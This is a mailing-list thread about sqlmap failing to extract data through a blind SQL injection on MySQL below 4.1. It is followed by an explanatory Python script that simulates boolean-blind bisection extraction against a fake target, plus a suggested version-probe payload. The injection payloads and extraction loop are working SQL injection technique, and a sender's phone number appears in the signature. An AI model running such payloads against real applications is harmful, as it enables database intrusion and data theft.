Re: [sqlmap-users] Subquery payloads on mysql <4.1
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-12 20:53:45
Hi Till,

Is the injection point only boolean? No UNION? No error-based? Try to increase the value of --level.

Can you enumerate the -b? A run with -t traffic.log and inspection of the log file afterwards would be helpful.

I reckon I've only detected a SQL injection in MySQL < 4.1 a long time ago and, as far as I remember, it worked with sqlmap, but I might be wrong.

Bernardo

On 12 July 2011 12:01, Till .ch <ti...@ho...> wrote:
> Hi
>
> Lately I've been playing with sqlmap and a 4.0 MySQL server. sqlmap detected
> the injection point just fine, but struggled with gathering information
> about other tables.
> I guess this happened due to the fact that subqueries were introduced
> with MySQL >= 4.1 (http://dev.mysql.com/doc/refman/4.1/en/news-4-1-x.html)
> and thus payloads like the following are regarded as an invalid query on
> MySQL < 4.1:
>
> [PAYLOAD] 1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32))
> FROM randomtable),1,1)) > 51
>
> Best Regards
> Till

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable
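The payload Till quotes is one probe of a boolean-blind bisection: sqlmap asks "is ORD() of character N greater than T?" repeatedly, narrowing T until the byte is known, then moves to the next position. The script below is an added example, not code from the thread or from sqlmap, that reproduces that loop against a constructed stand-in for the vulnerable page. The subquery text, the `1234` prefix and the `FakeTarget` class are assumptions made for the demonstration; the `subqueries_supported=False` switch models the MySQL < 4.1 behaviour Till describes, where the injected subquery makes the whole statement a syntax error and the application shows its "false" page for every probe.

```python
import re

# Payload shape taken from the thread; the parenthesised subquery is the part
# that MySQL < 4.1 cannot parse.
TEMPLATE = "{prefix} AND ORD(MID(({subquery}),{pos},1)) > {threshold}"

# Assumed sample subquery, modelled on the one in Till's mail.
SAMPLE_SUBQUERY = "SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)) FROM randomtable"


def build_payload(prefix, subquery, pos, threshold):
    """Render one boolean probe: 'is ORD(char at pos) > threshold?'."""
    return TEMPLATE.format(prefix=prefix, subquery=subquery, pos=pos, threshold=threshold)


_PAYLOAD_RE = re.compile(r"ORD\(MID\(\((?P<sub>.*)\),(?P<pos>\d+),1\)\) > (?P<thr>\d+)$")


class FakeTarget:
    """Constructed stand-in for the injectable page (hypothetical, for this example).

    `secret` is the string the subquery would return on a real server.
    `subqueries_supported=False` models MySQL < 4.1: the statement is a syntax
    error, so the application renders its 'false' page regardless of the data.
    """

    def __init__(self, secret, subqueries_supported=True):
        self.secret = secret
        self.subqueries_supported = subqueries_supported
        self.requests = 0  # how many HTTP requests a real run would have made

    def is_true_page(self, payload):
        self.requests += 1
        m = _PAYLOAD_RE.search(payload)
        if m is None:
            raise ValueError("unrecognised payload: %r" % payload)
        if not self.subqueries_supported:
            return False  # whole query fails to parse -> 'false' page
        pos = int(m.group("pos"))
        # MySQL semantics: MID() past the end returns '', and ORD('') is 0.
        ch = self.secret[pos - 1] if pos <= len(self.secret) else ""
        value = ord(ch) if ch else 0
        return value > int(m.group("thr"))


def extract_char(target, prefix, subquery, pos):
    """Binary-search the byte value at `pos` with '>' comparisons (8 probes per byte)."""
    lo, hi = 0, 255
    while lo < hi:
        mid = (lo + hi) // 2
        if target.is_true_page(build_payload(prefix, subquery, pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(target, prefix, subquery, max_len=64):
    """Pull characters until ORD() comes back 0, i.e. MID() ran off the end."""
    out = []
    for pos in range(1, max_len + 1):
        code = extract_char(target, prefix, subquery, pos)
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out)


if __name__ == "__main__":
    ok = FakeTarget("42")
    print("MySQL >= 4.1:", repr(extract_string(ok, "1234", SAMPLE_SUBQUERY)), ok.requests, "requests")
    old = FakeTarget("42", subqueries_supported=False)
    print("MySQL < 4.1: ", repr(extract_string(old, "1234", SAMPLE_SUBQUERY)), old.requests, "requests")
```

Against the pre-4.1 stand-in every probe answers "false", so the first byte bisects to 0 and extraction stops after eight requests with an empty string; that is the symptom to look for in a `-t traffic.log` capture, since a boolean check that never fires is indistinguishable from an empty result unless you inspect the responses. On a real target the first thing to confirm is whether a subquery-free probe such as `1234 AND ORD(MID(VERSION(),1,1)) > 51` still flips the page, which separates "the injection is gone" from "the server cannot parse the subquery".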